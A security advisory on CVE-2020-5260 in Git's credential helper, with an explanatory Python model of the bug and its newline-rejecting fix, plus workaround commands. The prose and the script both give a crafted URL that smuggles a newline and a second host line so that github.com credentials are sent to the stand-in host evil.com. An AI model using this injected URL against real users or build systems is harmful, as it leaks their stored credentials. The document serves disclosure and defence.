Vulnerability in Git's credential handling

Corrective releases of the distributed version control system Git have been published: 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 and 2.17.4. They fix a vulnerability (CVE-2020-5260) in the "credential.helper" mechanism that causes credentials to be sent to the wrong host when the git client accesses a repository through a specially crafted URL containing a newline character. The flaw can be used to make the credentials stored for one host be sent to a server controlled by the attacker.

When a URL such as "https://evil.com?%0ahost=github.com/" is specified, the credential helper, while connecting to the malicious host evil.com, hands over the authentication data stored for github.com. The problem arises during operations such as "git clone", including the processing of submodule URLs (for example, "git submodule update" automatically processes the URLs listed in the repository's .gitmodules file). The vulnerability is most dangerous in situations where a developer clones a repository without ever seeing the URL, for instance when working with submodules, or in systems that perform operations automatically, such as package build scripts.

In the new versions the vulnerability is blocked by rejecting a newline character in any value passed over the credential-helper protocol. For distributions, package updates can be tracked on the pages of Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch and FreeBSD.
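The two paragraphs above describe the injection and the fix only in words. The following added example (not code from the Git project or from the original article) models the exchange: the credential-helper protocol is line oriented, one "key=value" per line terminated by a blank line, so a percent-encoded newline that survives URL decoding lets an attacker append a second "host=" line that a helper reads as the real host. The URL parsing, the serialization and the toy helper are simplified models of Git's behaviour, and the function names are assumptions for illustration.

```python
"""Model of the CVE-2020-5260 credential-protocol injection and the fix.

The protocol between git and a credential helper looks like:

    protocol=https
    host=github.com
    <blank line>

This is a simplified reconstruction, not Git's own code.
"""
from urllib.parse import unquote

# Constructed sample URLs: the crafted one from the advisory and a benign one.
MALICIOUS_URL = "https://evil.com?%0ahost=github.com/"
BENIGN_URL = "https://github.com/user/repo.git"


def parse_url_for_credential(url: str) -> dict:
    """Rough model of how a credential is derived from a URL.

    The host is taken up to the first '/' and percent-decoded. Because '?' is
    not treated as a separator here, the encoded %0a lands inside the host
    value as a literal newline (modelled; the real parser is more involved).
    """
    scheme, rest = url.split("://", 1)
    host, _, _path = rest.partition("/")
    return {"protocol": scheme, "host": unquote(host)}


def serialize_vulnerable(cred: dict) -> str:
    """Pre-fix behaviour (modelled): values are written verbatim, one per line."""
    return "".join(f"{key}={value}\n" for key, value in cred.items()) + "\n"


def serialize_fixed(cred: dict) -> str:
    """Fixed behaviour: refuse any value that contains a newline."""
    for key, value in cred.items():
        if "\n" in value:
            raise ValueError(f"credential value for {key} contains newline")
    return serialize_vulnerable(cred)


def helper_parse(request: str) -> dict:
    """A minimal credential helper reader: one key=value per line, last key wins.

    Stops at the first blank line, exactly like a line-oriented helper would.
    """
    result = {}
    for line in request.split("\n"):
        if line == "":
            break
        key, _, value = line.partition("=")
        result[key] = value
    return result


def fixed_rejects(url: str) -> bool:
    """True if the fixed serializer refuses the credential derived from url."""
    try:
        serialize_fixed(parse_url_for_credential(url))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    cred = parse_url_for_credential(MALICIOUS_URL)
    request = serialize_vulnerable(cred)
    print(repr(request))
    # The helper sees two host= lines and keeps the last one: github.com.
    print("helper matched host:", helper_parse(request)["host"])
    print("fixed version rejects crafted URL:", fixed_rejects(MALICIOUS_URL))
    print("fixed version rejects benign URL:", fixed_rejects(BENIGN_URL))
```

The essential point the model makes visible is that the helper has no way to tell an injected "host=" line from a legitimate one once the newline is in the stream, which is why the fix is applied on the git side, before the value is written, rather than in the helpers.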

As a workaround, it is recommended not to use credential.helper when accessing public repositories and not to run "git clone" with "--recurse-submodules" on unverified repositories. To disable the credential.helper mechanism entirely (it stores passwords and retrieves them from a cache, a protected keystore or a password file), the following commands can be used:

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

source: opennet.ru